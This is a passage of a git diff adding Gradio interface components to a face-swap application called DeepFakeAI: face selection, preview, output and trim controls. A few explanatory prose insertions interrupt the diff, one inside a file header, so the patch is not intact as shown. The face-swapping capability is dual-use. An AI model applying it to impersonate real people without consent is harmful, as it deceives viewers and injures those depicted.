DeepFakeAI.uis.typing import Update + +FACE_ANALYSER_DIRECTION_DROPDOWN : Optional[gradio.Dropdown] = None +FACE_ANALYSER_AGE_DROPDOWN : Optional[gradio.Dropdown] = None +FACE_ANALYSER_GENDER_DROPDOWN : Optional[gradio.Dropdown] = None + + +def render() -> None: + global FACE_ANALYSER_DIRECTION_DROPDOWN + global FACE_ANALYSER_AGE_DROPDOWN + global FACE_ANALYSER_GENDER_DROPDOWN + + with gradio.Box(): + with gradio.Row(): + FACE_ANALYSER_DIRECTION_DROPDOWN = gradio.Dropdown( + label = wording.get('face_analyser_direction_dropdown_label'), + choices = DeepFakeAI.choices.face_analyser_direction, + value = DeepFakeAI.globals.face_analyser_direction + ) + FACE_ANALYSER_AGE_DROPDOWN = gradio.Dropdown( + label = wording.get('face_analyser_age_dropdown_label'), + choices = ['none'] + DeepFakeAI.choices.face_analyser_age, + value = DeepFakeAI.globals.face_analyser_age or 'none' + ) + FACE_ANALYSER_GENDER_DROPDOWN = gradio.Dropdown( + label = wording.get('face_analyser_gender_dropdown_label'), + choices = ['none'] + DeepFakeAI.choices.face_analyser_gender, + value = DeepFakeAI.globals.face_analyser_gender or 'none' + ) + ui.register_component('face_analyser_direction_dropdown', FACE_ANALYSER_DIRECTION_DROPDOWN) + ui.register_component('face_analyser_age_dropdown', FACE_ANALYSER_AGE_DROPDOWN) + ui.register_component('face_analyser_gender_dropdown', FACE_ANALYSER_GENDER_DROPDOWN) + + +def listen() -> None: + FACE_ANALYSER_DIRECTION_DROPDOWN.select(lambda value: update_dropdown('face_analyser_direction', value), inputs = FACE_ANALYSER_DIRECTION_DROPDOWN, outputs = FACE_ANALYSER_DIRECTION_DROPDOWN) + FACE_ANALYSER_AGE_DROPDOWN.select(lambda value: update_dropdown('face_analyser_age', value), inputs = FACE_ANALYSER_AGE_DROPDOWN, outputs = FACE_ANALYSER_AGE_DROPDOWN) + FACE_ANALYSER_GENDER_DROPDOWN.select(lambda value: update_dropdown('face_analyser_gender', value), inputs = FACE_ANALYSER_GENDER_DROPDOWN, outputs = FACE_ANALYSER_GENDER_DROPDOWN) + + +def update_dropdown(name : str, value : str) -> Update: + if value == 'none': + setattr(DeepFakeAI.globals, name, None) + else: + setattr(DeepFakeAI.globals, name, value) + return gradio.update(value = value) diff --git a/DeepFakeAI/uis/components/face_selector.py b/DeepFakeAI/uis/components/face_selector.py new file mode 100644 index 0000000000000000000000000000000000000000..b6f4c66e07c46ce0f961acbd99289e421cd4e619 --- /dev/null +++ b/DeepFakeAI/uis/components/face_selector.py @@ -0,0 +1,133 @@ +from typing import List, Optional, Tuple, Any, Dict +from time import sleep + +import cv2 +import gradio + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.capturer import get_video_frame +from DeepFakeAI.face_analyser import get_many_faces +from DeepFakeAI.face_reference import clear_face_reference +from DeepFakeAI.typing import Frame, FaceRecognition +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import ComponentName, Update +from DeepFakeAI.utilities import is_image, is_video + +FACE_RECOGNITION_DROPDOWN : Optional[gradio.Dropdown] = None +REFERENCE_FACE_POSITION_GALLERY : Optional[gradio.Gallery] = None +REFERENCE_FACE_DISTANCE_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global FACE_RECOGNITION_DROPDOWN + global REFERENCE_FACE_POSITION_GALLERY + global REFERENCE_FACE_DISTANCE_SLIDER + + with gradio.Box(): + reference_face_gallery_args: Dict[str, Any] = { + 'label': wording.get('reference_face_gallery_label'), + 'height': 120, + 'object_fit': 'cover', + 'columns': 10, 
+ 'allow_preview': False, + 'visible': 'reference' in DeepFakeAI.globals.face_recognition + } + if is_image(DeepFakeAI.globals.target_path): + reference_frame = cv2.imread(DeepFakeAI.globals.target_path) + reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) + if is_video(DeepFakeAI.globals.target_path): + reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) + FACE_RECOGNITION_DROPDOWN = gradio.Dropdown( + label = wording.get('face_recognition_dropdown_label'), + choices = DeepFakeAI.choices.face_recognition, + value = DeepFakeAI.globals.face_recognition + ) + REFERENCE_FACE_POSITION_GALLERY = gradio.Gallery(**reference_face_gallery_args) + REFERENCE_FACE_DISTANCE_SLIDER = gradio.Slider( + label = wording.get('reference_face_distance_slider_label'), + value = DeepFakeAI.globals.reference_face_distance, + maximum = 3, + step = 0.05, + visible = 'reference' in DeepFakeAI.globals.face_recognition + ) + ui.register_component('face_recognition_dropdown', FACE_RECOGNITION_DROPDOWN) + ui.register_component('reference_face_position_gallery', REFERENCE_FACE_POSITION_GALLERY) + ui.register_component('reference_face_distance_slider', REFERENCE_FACE_DISTANCE_SLIDER) + + +def listen() -> None: + FACE_RECOGNITION_DROPDOWN.select(update_face_recognition, inputs = FACE_RECOGNITION_DROPDOWN, outputs = [ REFERENCE_FACE_POSITION_GALLERY, REFERENCE_FACE_DISTANCE_SLIDER ]) + REFERENCE_FACE_POSITION_GALLERY.select(clear_and_update_face_reference_position) + REFERENCE_FACE_DISTANCE_SLIDER.change(update_reference_face_distance, inputs = REFERENCE_FACE_DISTANCE_SLIDER) + update_component_names : List[ComponentName] =\ + [ + 'target_file', + 'preview_frame_slider' + ] + for component_name in update_component_names: + component = ui.get_component(component_name) + if component: + component.change(update_face_reference_position, outputs = REFERENCE_FACE_POSITION_GALLERY) + select_component_names : List[ComponentName] =\ + [ + 'face_analyser_direction_dropdown', + 'face_analyser_age_dropdown', + 'face_analyser_gender_dropdown' + ] + for component_name in select_component_names: + component = ui.get_component(component_name) + if component: + component.select(update_face_reference_position, outputs = REFERENCE_FACE_POSITION_GALLERY) + + +def update_face_recognition(face_recognition : FaceRecognition) -> Tuple[Update, Update]: + if face_recognition == 'reference': + DeepFakeAI.globals.face_recognition = face_recognition + return gradio.update(visible = True), gradio.update(visible = True) + if face_recognition == 'many': + DeepFakeAI.globals.face_recognition = face_recognition + return gradio.update(visible = False), gradio.update(visible = False) + + +def clear_and_update_face_reference_position(event: gradio.SelectData) -> Update: + clear_face_reference() + return update_face_reference_position(event.index) + + +def update_face_reference_position(reference_face_position : int = 0) -> Update: + sleep(0.2) + gallery_frames = [] + DeepFakeAI.globals.reference_face_position = reference_face_position + if is_image(DeepFakeAI.globals.target_path): + reference_frame = cv2.imread(DeepFakeAI.globals.target_path) + gallery_frames = extract_gallery_frames(reference_frame) + if is_video(DeepFakeAI.globals.target_path): + reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + gallery_frames = 
extract_gallery_frames(reference_frame) + if gallery_frames: + return gradio.update(value = gallery_frames) + return gradio.update(value = None) + + +def update_reference_face_distance(reference_face_distance : float) -> Update: + DeepFakeAI.globals.reference_face_distance = reference_face_distance + return gradio.update(value = reference_face_distance) + + +def extract_gallery_frames(reference_frame : Frame) -> List[Frame]: + crop_frames = [] + faces = get_many_faces(reference_frame) + for face in faces: + start_x, start_y, end_x, end_y = map(int, face['bbox']) + padding_x = int((end_x - start_x) * 0.25) + padding_y = int((end_y - start_y) * 0.25) + start_x = max(0, start_x - padding_x) + start_y = max(0, start_y - padding_y) + end_x = max(0, end_x + padding_x) + end_y = max(0, end_y + padding_y) + crop_frame = reference_frame[start_y:end_y, start_x:end_x] + crop_frames.append(ui.normalize_frame(crop_frame)) + return crop_frames diff --git a/DeepFakeAI/uis/components/output.py b/DeepFakeAI/uis/components/output.py new file mode 100644 index 0000000000000000000000000000000000000000..f2f1736e9b6b6e9b394cbdfd635b87a570fa6f72 --- /dev/null +++ b/DeepFakeAI/uis/components/output.py @@ -0,0 +1,55 @@ +from typing import Tuple, Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.core import conditional_process +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import is_image, is_video, normalize_output_path, clear_temp + +OUTPUT_START_BUTTON : Optional[gradio.Button] = None +OUTPUT_CLEAR_BUTTON : Optional[gradio.Button] = None +OUTPUT_IMAGE : Optional[gradio.Image] = None +OUTPUT_VIDEO : Optional[gradio.Video] = None + + +def render() -> None: + global OUTPUT_START_BUTTON + global OUTPUT_CLEAR_BUTTON + global OUTPUT_IMAGE + global OUTPUT_VIDEO + + with gradio.Row(): + with gradio.Box(): + OUTPUT_IMAGE = gradio.Image( + label = wording.get('output_image_or_video_label'), + visible = False + ) + OUTPUT_VIDEO = gradio.Video( + label = wording.get('output_image_or_video_label') + ) + with gradio.Row(): + OUTPUT_START_BUTTON = gradio.Button(wording.get('start_button_label')) + OUTPUT_CLEAR_BUTTON = gradio.Button(wording.get('clear_button_label')) + + +def listen() -> None: + OUTPUT_START_BUTTON.click(update, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) + OUTPUT_CLEAR_BUTTON.click(clear, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) + + +def update() -> Tuple[Update, Update]: + DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, '.') + if DeepFakeAI.globals.output_path: + conditional_process() + if is_image(DeepFakeAI.globals.output_path): + return gradio.update(value = DeepFakeAI.globals.output_path, visible = True), gradio.update(value = None, visible = False) + if is_video(DeepFakeAI.globals.output_path): + return gradio.update(value = None, visible = False), gradio.update(value = DeepFakeAI.globals.output_path, visible = True) + return gradio.update(value = None, visible = False), gradio.update(value = None, visible = False) + + +def clear() -> Tuple[Update, Update]: + if DeepFakeAI.globals.target_path: + clear_temp(DeepFakeAI.globals.target_path) + return gradio.update(value = None), gradio.update(value = None) diff --git a/DeepFakeAI/uis/components/output_settings.py b/DeepFakeAI/uis/components/output_settings.py new file mode 100644 index 0000000000000000000000000000000000000000..4146cd955361fe738525c50b033054a6ae1b3a82 --- /dev/null +++ 
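The output component above resolves its destination through normalize_output_path, which is defined further down in DeepFakeAI/utilities.py. A minimal usage sketch, assuming the DeepFakeAI package is importable and using placeholder file names:

```python
# Illustration of normalize_output_path from DeepFakeAI/utilities.py:
# a directory output_path yields '<source-stem>-<target-stem><target-ext>'
# inside that directory, while a file output_path is returned unchanged.
from DeepFakeAI.utilities import normalize_output_path

print(normalize_output_path('source.jpg', 'target-1080p.mp4', '.'))
# -> ./source-target-1080p.mp4
print(normalize_output_path('source.jpg', 'target-1080p.mp4', 'result.mp4'))
# -> result.mp4
```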
b/DeepFakeAI/uis/components/output_settings.py @@ -0,0 +1,43 @@ +from typing import Optional +import gradio + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.typing import OutputVideoEncoder +from DeepFakeAI.uis.typing import Update + +OUTPUT_VIDEO_ENCODER_DROPDOWN : Optional[gradio.Dropdown] = None +OUTPUT_VIDEO_QUALITY_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global OUTPUT_VIDEO_ENCODER_DROPDOWN + global OUTPUT_VIDEO_QUALITY_SLIDER + + with gradio.Box(): + OUTPUT_VIDEO_ENCODER_DROPDOWN = gradio.Dropdown( + label = wording.get('output_video_encoder_dropdown_label'), + choices = DeepFakeAI.choices.output_video_encoder, + value = DeepFakeAI.globals.output_video_encoder + ) + OUTPUT_VIDEO_QUALITY_SLIDER = gradio.Slider( + label = wording.get('output_video_quality_slider_label'), + value = DeepFakeAI.globals.output_video_quality, + step = 1 + ) + + +def listen() -> None: + OUTPUT_VIDEO_ENCODER_DROPDOWN.select(update_output_video_encoder, inputs = OUTPUT_VIDEO_ENCODER_DROPDOWN, outputs = OUTPUT_VIDEO_ENCODER_DROPDOWN) + OUTPUT_VIDEO_QUALITY_SLIDER.change(update_output_video_quality, inputs = OUTPUT_VIDEO_QUALITY_SLIDER, outputs = OUTPUT_VIDEO_QUALITY_SLIDER) + + +def update_output_video_encoder(output_video_encoder: OutputVideoEncoder) -> Update: + DeepFakeAI.globals.output_video_encoder = output_video_encoder + return gradio.update(value = output_video_encoder) + + +def update_output_video_quality(output_video_quality : int) -> Update: + DeepFakeAI.globals.output_video_quality = output_video_quality + return gradio.update(value = output_video_quality) diff --git a/DeepFakeAI/uis/components/preview.py b/DeepFakeAI/uis/components/preview.py new file mode 100644 index 0000000000000000000000000000000000000000..f86acaacc7f83c814d73b29186e019e97034a45e --- /dev/null +++ b/DeepFakeAI/uis/components/preview.py @@ -0,0 +1,121 @@ +from time import sleep +from typing import Any, Dict, Tuple, List, Optional +import cv2 +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.capturer import get_video_frame, get_video_frame_total +from DeepFakeAI.face_analyser import get_one_face +from DeepFakeAI.face_reference import get_face_reference, set_face_reference +from DeepFakeAI.predictor import predict_frame +from DeepFakeAI.processors.frame.core import load_frame_processor_module +from DeepFakeAI.typing import Frame +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import ComponentName, Update +from DeepFakeAI.utilities import is_video, is_image + +PREVIEW_IMAGE : Optional[gradio.Image] = None +PREVIEW_FRAME_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global PREVIEW_IMAGE + global PREVIEW_FRAME_SLIDER + + with gradio.Box(): + preview_image_args: Dict[str, Any] = { + 'label': wording.get('preview_image_label') + } + preview_frame_slider_args: Dict[str, Any] = { + 'label': wording.get('preview_frame_slider_label'), + 'step': 1, + 'visible': False + } + if is_image(DeepFakeAI.globals.target_path): + target_frame = cv2.imread(DeepFakeAI.globals.target_path) + preview_frame = extract_preview_frame(target_frame) + preview_image_args['value'] = ui.normalize_frame(preview_frame) + if is_video(DeepFakeAI.globals.target_path): + temp_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + preview_frame = extract_preview_frame(temp_frame) + preview_image_args['value'] = ui.normalize_frame(preview_frame) + 
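The preview component being rendered here, like face_selector above, builds its widgets from a conditional keyword-argument dict and unpacks it into a single gradio constructor call. A condensed sketch of that pattern (the helper name build_slider and its literal values are hypothetical, for illustration only):

```python
# Minimal sketch of the kwargs-dict pattern used by the preview and
# face_selector components: collect constructor arguments conditionally,
# then unpack them with ** into one gradio call.
from typing import Any, Dict
import gradio

def build_slider(maximum : int = 0) -> gradio.Slider:
	slider_args : Dict[str, Any] = {
		'label': 'PREVIEW FRAME',  # illustrative label
		'step': 1,
		'visible': False
	}
	if maximum > 0:  # e.g. a video target was selected
		slider_args['maximum'] = maximum
		slider_args['visible'] = True
	return gradio.Slider(**slider_args)
```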
preview_image_args['visible'] = True + preview_frame_slider_args['value'] = DeepFakeAI.globals.reference_frame_number + preview_frame_slider_args['maximum'] = get_video_frame_total(DeepFakeAI.globals.target_path) + preview_frame_slider_args['visible'] = True + PREVIEW_IMAGE = gradio.Image(**preview_image_args) + PREVIEW_FRAME_SLIDER = gradio.Slider(**preview_frame_slider_args) + ui.register_component('preview_frame_slider', PREVIEW_FRAME_SLIDER) + + +def listen() -> None: + PREVIEW_FRAME_SLIDER.change(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) + update_component_names : List[ComponentName] =\ + [ + 'source_file', + 'target_file', + 'face_recognition_dropdown', + 'reference_face_distance_slider', + 'frame_processors_checkbox_group' + ] + for component_name in update_component_names: + component = ui.get_component(component_name) + if component: + component.change(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) + select_component_names : List[ComponentName] =\ + [ + 'reference_face_position_gallery', + 'face_analyser_direction_dropdown', + 'face_analyser_age_dropdown', + 'face_analyser_gender_dropdown' + ] + for component_name in select_component_names: + component = ui.get_component(component_name) + if component: + component.select(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) + + +def update(frame_number : int = 0) -> Tuple[Update, Update]: + sleep(0.1) + if is_image(DeepFakeAI.globals.target_path): + target_frame = cv2.imread(DeepFakeAI.globals.target_path) + preview_frame = extract_preview_frame(target_frame) + return gradio.update(value = ui.normalize_frame(preview_frame)), gradio.update(value = None, maximum = None, visible = False) + if is_video(DeepFakeAI.globals.target_path): + DeepFakeAI.globals.reference_frame_number = frame_number + video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) + temp_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + preview_frame = extract_preview_frame(temp_frame) + return gradio.update(value = ui.normalize_frame(preview_frame)), gradio.update(maximum = video_frame_total, visible = True) + return gradio.update(value = None), gradio.update(value = None, maximum = None, visible = False) + + +def extract_preview_frame(temp_frame : Frame) -> Frame: + if predict_frame(temp_frame): + return cv2.GaussianBlur(temp_frame, (99, 99), 0) + source_face = get_one_face(cv2.imread(DeepFakeAI.globals.source_path)) if DeepFakeAI.globals.source_path else None + temp_frame = reduce_preview_frame(temp_frame) + if 'reference' in DeepFakeAI.globals.face_recognition and not get_face_reference(): + reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) + reference_face = get_one_face(reference_frame, DeepFakeAI.globals.reference_face_position) + set_face_reference(reference_face) + reference_face = get_face_reference() if 'reference' in DeepFakeAI.globals.face_recognition else None + for frame_processor in DeepFakeAI.globals.frame_processors: + frame_processor_module = load_frame_processor_module(frame_processor) + if frame_processor_module.pre_process(): + temp_frame = frame_processor_module.process_frame( + source_face, + reference_face, + temp_frame + ) + return temp_frame + + +def reduce_preview_frame(temp_frame : Frame, max_height : int = 480) -> Frame: + height, width = temp_frame.shape[:2] + if height > max_height: + 
scale = max_height / height + max_width = int(width * scale) + temp_frame = cv2.resize(temp_frame, (max_width, max_height)) + return temp_frame diff --git a/DeepFakeAI/uis/components/processors.py b/DeepFakeAI/uis/components/processors.py new file mode 100644 index 0000000000000000000000000000000000000000..b87da139b019f6c51a1adc45ad65a09f4578aa66 --- /dev/null +++ b/DeepFakeAI/uis/components/processors.py @@ -0,0 +1,41 @@ +from typing import List, Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.processors.frame.core import load_frame_processor_module, clear_frame_processors_modules +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import list_module_names + +FRAME_PROCESSORS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None + + +def render() -> None: + global FRAME_PROCESSORS_CHECKBOX_GROUP + + with gradio.Box(): + FRAME_PROCESSORS_CHECKBOX_GROUP = gradio.CheckboxGroup( + label = wording.get('frame_processors_checkbox_group_label'), + choices = sort_frame_processors(DeepFakeAI.globals.frame_processors), + value = DeepFakeAI.globals.frame_processors + ) + ui.register_component('frame_processors_checkbox_group', FRAME_PROCESSORS_CHECKBOX_GROUP) + + +def listen() -> None: + FRAME_PROCESSORS_CHECKBOX_GROUP.change(update_frame_processors, inputs = FRAME_PROCESSORS_CHECKBOX_GROUP, outputs = FRAME_PROCESSORS_CHECKBOX_GROUP) + + +def update_frame_processors(frame_processors : List[str]) -> Update: + clear_frame_processors_modules() + DeepFakeAI.globals.frame_processors = frame_processors + for frame_processor in DeepFakeAI.globals.frame_processors: + frame_processor_module = load_frame_processor_module(frame_processor) + frame_processor_module.pre_check() + return gradio.update(value = frame_processors, choices = sort_frame_processors(frame_processors)) + + +def sort_frame_processors(frame_processors : List[str]) -> list[str]: + frame_processors_names = list_module_names('DeepFakeAI/processors/frame/modules') + return sorted(frame_processors_names, key = lambda frame_processor : frame_processors.index(frame_processor) if frame_processor in frame_processors else len(frame_processors)) diff --git a/DeepFakeAI/uis/components/settings.py b/DeepFakeAI/uis/components/settings.py new file mode 100644 index 0000000000000000000000000000000000000000..ec5c30b023f0ea5563a58dbaa5ea993a53ffba86 --- /dev/null +++ b/DeepFakeAI/uis/components/settings.py @@ -0,0 +1,41 @@ +from typing import Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.uis.typing import Update + +KEEP_FPS_CHECKBOX : Optional[gradio.Checkbox] = None +KEEP_TEMP_CHECKBOX : Optional[gradio.Checkbox] = None +SKIP_AUDIO_CHECKBOX : Optional[gradio.Checkbox] = None + + +def render() -> None: + global KEEP_FPS_CHECKBOX + global KEEP_TEMP_CHECKBOX + global SKIP_AUDIO_CHECKBOX + + with gradio.Box(): + KEEP_FPS_CHECKBOX = gradio.Checkbox( + label = wording.get('keep_fps_checkbox_label'), + value = DeepFakeAI.globals.keep_fps + ) + KEEP_TEMP_CHECKBOX = gradio.Checkbox( + label = wording.get('keep_temp_checkbox_label'), + value = DeepFakeAI.globals.keep_temp + ) + SKIP_AUDIO_CHECKBOX = gradio.Checkbox( + label = wording.get('skip_audio_checkbox_label'), + value = DeepFakeAI.globals.skip_audio + ) + + +def listen() -> None: + KEEP_FPS_CHECKBOX.change(lambda value: update_checkbox('keep_fps', value), inputs = KEEP_FPS_CHECKBOX, outputs = KEEP_FPS_CHECKBOX) + KEEP_TEMP_CHECKBOX.change(lambda 
value: update_checkbox('keep_temp', value), inputs = KEEP_TEMP_CHECKBOX, outputs = KEEP_TEMP_CHECKBOX) + SKIP_AUDIO_CHECKBOX.change(lambda value: update_checkbox('skip_audio', value), inputs = SKIP_AUDIO_CHECKBOX, outputs = SKIP_AUDIO_CHECKBOX) + + +def update_checkbox(name : str, value: bool) -> Update: + setattr(DeepFakeAI.globals, name, value) + return gradio.update(value = value) diff --git a/DeepFakeAI/uis/components/source.py b/DeepFakeAI/uis/components/source.py new file mode 100644 index 0000000000000000000000000000000000000000..29b77715b0648d49761a466bb9374dd7c32c4150 --- /dev/null +++ b/DeepFakeAI/uis/components/source.py @@ -0,0 +1,48 @@ +from typing import Any, IO, Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import is_image + +SOURCE_FILE : Optional[gradio.File] = None +SOURCE_IMAGE : Optional[gradio.Image] = None + + +def render() -> None: + global SOURCE_FILE + global SOURCE_IMAGE + + with gradio.Box(): + is_source_image = is_image(DeepFakeAI.globals.source_path) + SOURCE_FILE = gradio.File( + file_count = 'single', + file_types= + [ + '.png', + '.jpg', + '.webp' + ], + label = wording.get('source_file_label'), + value = DeepFakeAI.globals.source_path if is_source_image else None + ) + ui.register_component('source_file', SOURCE_FILE) + SOURCE_IMAGE = gradio.Image( + value = SOURCE_FILE.value['name'] if is_source_image else None, + visible = is_source_image, + show_label = False + ) + + +def listen() -> None: + SOURCE_FILE.change(update, inputs = SOURCE_FILE, outputs = SOURCE_IMAGE) + + +def update(file: IO[Any]) -> Update: + if file and is_image(file.name): + DeepFakeAI.globals.source_path = file.name + return gradio.update(value = file.name, visible = True) + DeepFakeAI.globals.source_path = None + return gradio.update(value = None, visible = False) diff --git a/DeepFakeAI/uis/components/target.py b/DeepFakeAI/uis/components/target.py new file mode 100644 index 0000000000000000000000000000000000000000..022cd8da664e0555e79f61bb875ffca47f98589e --- /dev/null +++ b/DeepFakeAI/uis/components/target.py @@ -0,0 +1,62 @@ +from typing import Any, IO, Tuple, Optional +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.face_reference import clear_face_reference +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import is_image, is_video + +TARGET_FILE : Optional[gradio.File] = None +TARGET_IMAGE : Optional[gradio.Image] = None +TARGET_VIDEO : Optional[gradio.Video] = None + + +def render() -> None: + global TARGET_FILE + global TARGET_IMAGE + global TARGET_VIDEO + + with gradio.Box(): + is_target_image = is_image(DeepFakeAI.globals.target_path) + is_target_video = is_video(DeepFakeAI.globals.target_path) + TARGET_FILE = gradio.File( + label = wording.get('target_file_label'), + file_count = 'single', + file_types = + [ + '.png', + '.jpg', + '.webp', + '.mp4' + ], + value = DeepFakeAI.globals.target_path if is_target_image or is_target_video else None + ) + TARGET_IMAGE = gradio.Image( + value = TARGET_FILE.value['name'] if is_target_image else None, + visible = is_target_image, + show_label = False + ) + TARGET_VIDEO = gradio.Video( + value = TARGET_FILE.value['name'] if is_target_video else None, + visible = is_target_video, + show_label = False + ) + ui.register_component('target_file', TARGET_FILE) + + +def listen() -> None: + 
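The settings component just above, together with update_dropdown and update_number elsewhere in this diff, reduces to one pattern: write a single attribute of DeepFakeAI.globals via setattr and echo the value back to the UI. A condensed sketch (the helper name update_global is hypothetical):

```python
# Sketch of the generic state updater shared by the settings, face_analyser
# and trim_frame components: each gradio callback mutates one attribute of
# the DeepFakeAI.globals module, then returns the value for the widget.
import gradio

import DeepFakeAI.globals
from DeepFakeAI.uis.typing import Update

def update_global(name : str, value : object) -> Update:
	setattr(DeepFakeAI.globals, name, value)  # e.g. name = 'keep_fps'
	return gradio.update(value = value)
```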
TARGET_FILE.change(update, inputs = TARGET_FILE, outputs = [ TARGET_IMAGE, TARGET_VIDEO ]) + + +def update(file : IO[Any]) -> Tuple[Update, Update]: + clear_face_reference() + if file and is_image(file.name): + DeepFakeAI.globals.target_path = file.name + return gradio.update(value = file.name, visible = True), gradio.update(value = None, visible = False) + if file and is_video(file.name): + DeepFakeAI.globals.target_path = file.name + return gradio.update(value = None, visible = False), gradio.update(value = file.name, visible = True) + DeepFakeAI.globals.target_path = None + return gradio.update(value = None, visible = False), gradio.update(value = None, visible = False) diff --git a/DeepFakeAI/uis/components/temp_frame.py b/DeepFakeAI/uis/components/temp_frame.py new file mode 100644 index 0000000000000000000000000000000000000000..e1236f787144a8f87b8809c862f790f2abe5186c --- /dev/null +++ b/DeepFakeAI/uis/components/temp_frame.py @@ -0,0 +1,44 @@ +from typing import Optional +import gradio + +import DeepFakeAI.choices +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.typing import TempFrameFormat + +from DeepFakeAI.uis.typing import Update + +TEMP_FRAME_FORMAT_DROPDOWN : Optional[gradio.Dropdown] = None +TEMP_FRAME_QUALITY_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global TEMP_FRAME_FORMAT_DROPDOWN + global TEMP_FRAME_QUALITY_SLIDER + + with gradio.Box(): + TEMP_FRAME_FORMAT_DROPDOWN = gradio.Dropdown( + label = wording.get('temp_frame_format_dropdown_label'), + choices = DeepFakeAI.choices.temp_frame_format, + value = DeepFakeAI.globals.temp_frame_format + ) + TEMP_FRAME_QUALITY_SLIDER = gradio.Slider( + label = wording.get('temp_frame_quality_slider_label'), + value = DeepFakeAI.globals.temp_frame_quality, + step = 1 + ) + + +def listen() -> None: + TEMP_FRAME_FORMAT_DROPDOWN.select(update_temp_frame_format, inputs = TEMP_FRAME_FORMAT_DROPDOWN, outputs = TEMP_FRAME_FORMAT_DROPDOWN) + TEMP_FRAME_QUALITY_SLIDER.change(update_temp_frame_quality, inputs = TEMP_FRAME_QUALITY_SLIDER, outputs = TEMP_FRAME_QUALITY_SLIDER) + + +def update_temp_frame_format(temp_frame_format : TempFrameFormat) -> Update: + DeepFakeAI.globals.temp_frame_format = temp_frame_format + return gradio.update(value = temp_frame_format) + + +def update_temp_frame_quality(temp_frame_quality : int) -> Update: + DeepFakeAI.globals.temp_frame_quality = temp_frame_quality + return gradio.update(value = temp_frame_quality) diff --git a/DeepFakeAI/uis/components/trim_frame.py b/DeepFakeAI/uis/components/trim_frame.py new file mode 100644 index 0000000000000000000000000000000000000000..cf95f81e36e32ebcd7acbdfd4e15fb78618ce0c3 --- /dev/null +++ b/DeepFakeAI/uis/components/trim_frame.py @@ -0,0 +1,65 @@ +from time import sleep +from typing import Any, Dict, Tuple, Optional + +import gradio + +import DeepFakeAI.globals +from DeepFakeAI import wording +from DeepFakeAI.capturer import get_video_frame_total +from DeepFakeAI.uis import core as ui +from DeepFakeAI.uis.typing import Update +from DeepFakeAI.utilities import is_video + +TRIM_FRAME_START_SLIDER : Optional[gradio.Slider] = None +TRIM_FRAME_END_SLIDER : Optional[gradio.Slider] = None + + +def render() -> None: + global TRIM_FRAME_START_SLIDER + global TRIM_FRAME_END_SLIDER + + with gradio.Box(): + trim_frame_start_slider_args : Dict[str, Any] = { + 'label': wording.get('trim_frame_start_slider_label'), + 'step': 1, + 'visible': False + } + trim_frame_end_slider_args : Dict[str, Any] = { + 'label': 
wording.get('trim_frame_end_slider_label'), + 'step': 1, + 'visible': False + } + if is_video(DeepFakeAI.globals.target_path): + video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) + trim_frame_start_slider_args['value'] = DeepFakeAI.globals.trim_frame_start or 0 + trim_frame_start_slider_args['maximum'] = video_frame_total + trim_frame_start_slider_args['visible'] = True + trim_frame_end_slider_args['value'] = DeepFakeAI.globals.trim_frame_end or video_frame_total + trim_frame_end_slider_args['maximum'] = video_frame_total + trim_frame_end_slider_args['visible'] = True + with gradio.Row(): + TRIM_FRAME_START_SLIDER = gradio.Slider(**trim_frame_start_slider_args) + TRIM_FRAME_END_SLIDER = gradio.Slider(**trim_frame_end_slider_args) + + +def listen() -> None: + target_file = ui.get_component('target_file') + if target_file: + target_file.change(remote_update, outputs = [ TRIM_FRAME_START_SLIDER, TRIM_FRAME_END_SLIDER ]) + TRIM_FRAME_START_SLIDER.change(lambda value : update_number('trim_frame_start', int(value)), inputs = TRIM_FRAME_START_SLIDER, outputs = TRIM_FRAME_START_SLIDER) + TRIM_FRAME_END_SLIDER.change(lambda value : update_number('trim_frame_end', int(value)), inputs = TRIM_FRAME_END_SLIDER, outputs = TRIM_FRAME_END_SLIDER) + + +def remote_update() -> Tuple[Update, Update]: + sleep(0.1) + if is_video(DeepFakeAI.globals.target_path): + video_frame_total = 